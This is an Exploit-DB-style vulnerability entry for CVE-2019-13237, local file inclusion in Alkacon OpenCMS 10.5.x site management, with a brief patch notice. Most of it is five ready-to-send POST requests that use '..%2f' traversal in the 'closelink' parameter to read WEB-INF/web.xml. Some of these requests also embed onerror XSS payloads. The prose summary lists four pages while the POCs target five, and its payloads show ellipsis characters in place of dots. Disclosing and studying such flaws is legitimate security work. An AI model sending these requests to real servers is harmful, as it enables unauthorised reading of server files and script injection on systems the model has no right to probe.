Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms Site Management

vendor:

OpenCMS

by:

Aetsu

4.3

CVSS

MEDIUM

Local File Inclusion (LFI)

CWE

Product Name: OpenCMS

Affected Version From: 10.5.4

Affected Version To: 10.5.5

Patch Exists: YES

Related CWE: CVE-2019-13237

CPE: a:alkacon:opencms:10.5.5

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: 10.5.5 / 10.5.4

2019

Alkacon OpenCMS 10.5.x – Multiple LFI in Alkacon OpenCms Site Management

Alkacon OpenCMS 10.5.x is vulnerable to multiple Local File Inclusion (LFI) vulnerabilities. For the tests, the payloads used were “…%2f…%2fWEB-INF%2flogs%2fopencms.log” and “…%2f…%2fWEB-INF%2fweb.xml”. The vulnerable resources are “closelink” in the “loginmessage.jsp”, “xmlcontentrepair.jsp”, “group_new.jsp” and “index.jsp” pages.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Alkacon OpenCMS 10.5.x.

Source

Exploit-DB raw data:

# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms
Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13237

For the tests, I used the payloads:
```
…%2f…%2fWEB-INF%2flogs%2fopencms.log
…%2f…%2fWEB-INF%2fweb.xml
```

1. Affected resource closelink:
POC:
```
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com
enabled.0=true&enabled.0.value=true&message.0=%3Cimg+src%3D.+onerror%3Dalert%281%29%3E%0D%0A&loginForbidden.0.value=false&timeStart.0=1%2F3%2F2000+12%3A00+AM&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
2. Affected resource closelink:
POC:
```
POST /system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp
HTTP/1.1
Host: example.com
reporttype=extended&reportcontinuekey=&thread=dcbb6737-661b-11e9-a9fc-0242ac11002b&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=Ok
```
3. Affected resource closelink:
POC:
```
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27%29%3E&assignedOu.0=root+organizational+unit+%28%2F%29&enabled.0=true&enabled.0.value=true&ok=Ok&oufqn=&elementname=undefined&path=%252Faccounts%252Forgunit%252Fgroups%252Fnew&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
4. Affected resource closelink:
POC:
```
POST /system/workplace/admin/history/settings/index.jsp HTTP/1.1
Host: example.com
versions.0=10&mode.0=2&ok=OK&elementname=undefined&path=%252Fhistory%252Fsettings&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
5. Affected resource closelink:
POC:
```
POST /system/workplace/admin/history/reports/clearhistory.jsp HTTP/1.1
Host: example.com
reporttype=extended&reportcontinuekey=&thread=ac0bbd5f-66cd-11e9-ae09-0242ac11002b&classname=org.opencms.workplace.tools.history.CmsHistoryClearDialog&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=OK
```


Extended POCs: https://aetsu.github.io/OpenCms